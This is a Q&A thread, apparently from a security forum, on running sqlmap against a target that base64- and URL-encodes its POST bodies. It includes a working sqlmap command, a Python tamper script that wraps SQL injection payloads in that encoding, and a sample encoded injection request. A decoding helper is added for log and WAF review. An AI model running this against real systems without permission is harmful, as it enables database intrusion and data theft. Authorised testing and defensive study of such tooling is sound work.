
I have a target whose HTTP POST request data is encoded as follows:

The POST request data is first URL-encoded and then base64-encoded.

An example POST request from the mentioned target is as follows:

POST /test/test-page.php HTTP/1.1
Host: target.com
bmFtZTElM0R2YWx1ZTElMjZuYW1lMiUzRHZhbHVlMg==

To decode the POST request data, it must first be base64-decoded and then URL-decoded. After decoding it actually looks something like the following:

POST /test/test-page.php HTTP/1.1
Host: target.com
name1=value1&name2=value2

Now my question is: how do I run sqlmap on this target so that it injects queries into the parameter values of the POST request data, then encodes them as described above and sends them to the target server?

alrz

1 Answer

Sqlmap supports multiple ways to process parameters with custom code. You can use --eval to base64-encode a single parameter, like so:

--eval "import base64; paramname = base64.b64encode(paramname)"

Also, you can use the --tamper parameter to load a custom python script that modifies the payload.

Unfortunately it's not straightforward to tamper with the entire POST query string. But here is a suggestion for a workaround:

Specify an empty data string in your sqlmap command (use the asterisk (*) to indicate the injection point) and declare a --tamper script:

$ ./sqlmap.py -u "http://example.com/" --data "*" --method POST --tamper mytamper

The tamper script could look like this:

import base64
from urllib.parse import quote_plus


def tamper(payload, **kwargs):
    # Build the plain POST body with sqlmap's payload appended to name1
    params = 'name1=value1%s&name2=value2' % (payload or '')

    # First URL-encode the whole body, then base64-encode it, as the target expects
    data = quote_plus(params)
    data = base64.b64encode(data.encode('utf-8')).decode('ascii')

    return data

This script inserts the payload into your query and performs the URL-encoding and base64 conversions. It currently tests for the name1 parameter. You would have to change the injection point manually if you want to check the other one.

For the sample payload ) AND 3825=3825 AND (7759=7759 you would end up with a request like this:

POST / HTTP/1.1
Host: example.com
User-agent: sqlmap/1.0-dev-6fef294 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
[...]
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 92
Connection: close

bmFtZTElM0R2YWx1ZTElMjkrQU5EKzM4MjUlM0QzODI1K0FORCslMjg3NzU5JTNENzc1OSUyNm5hbWUyJTNEdmFsdWUy

As you can see, the POST body is URL- and base64-encoded.

Arminius
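The encoding scheme from the question and the tamper approach from the answer, as an added stand-alone example (not code from the answer or from sqlmap). It implements both directions of the scheme: an encoder that mirrors what the tamper script builds, and a decoder that a defender can run over logged request bodies to see the plain parameters (and the injected payload) behind the base64 blob. The two base64 bodies are copied from the question and the answer above; the function names and the parameter values are this example's own.

```python
import base64
import binascii
from urllib.parse import quote_plus, unquote_plus, parse_qsl

# Sample bodies taken from the question and the answer above
QUESTION_BODY = "bmFtZTElM0R2YWx1ZTElMjZuYW1lMiUzRHZhbHVlMg=="
ANSWER_BODY = ("bmFtZTElM0R2YWx1ZTElMjkrQU5EKzM4MjUlM0QzODI1K0FORCslMjg3NzU5"
               "JTNENzc1OSUyNm5hbWUyJTNEdmFsdWUy")


def encode_body(query_string):
    """URL-encode the whole query string, then base64-encode it (the target's scheme)."""
    url_encoded = quote_plus(query_string)
    return base64.b64encode(url_encoded.encode("utf-8")).decode("ascii")


def decode_body(body):
    """Reverse the scheme: base64-decode, then URL-decode.

    Returns None when the body is not valid base64 or not valid UTF-8, so a
    log-processing loop can skip malformed entries instead of crashing.
    """
    try:
        url_encoded = base64.b64decode(body, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return unquote_plus(url_encoded)


def decode_params(body):
    """Decode a body and split it into (name, value) pairs for inspection."""
    decoded = decode_body(body)
    if decoded is None:
        return None
    return parse_qsl(decoded, keep_blank_values=True)


def build_body(payload, name1_value="value1", name2_value="value2"):
    """Mirror the answer's tamper script: append the payload to name1, then encode the body.

    The parameter names and default values are the ones used in the question.
    """
    return encode_body("name1=%s%s&name2=%s" % (name1_value, payload, name2_value))


if __name__ == "__main__":
    # Decode the body from the question and show the plain parameters
    print(decode_params(QUESTION_BODY))
    # Decode the body from the answer: the injected payload is visible in name1
    print(decode_params(ANSWER_BODY))
```

Running `decode_params` over the answer's sample body shows the payload sitting inside `name1`, which is also the view a log reviewer or WAF rule gets once the base64 and URL layers are stripped; matching signatures against the raw base64 blob is pointless because any change in the payload shifts the whole encoded string.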
Very thankful. I would also suggest you visit this link (https://github.com/sqlmapproject/sqlmap/issues/2335#issuecomment-271121099) – alrz Jan 08 '17 at 11:37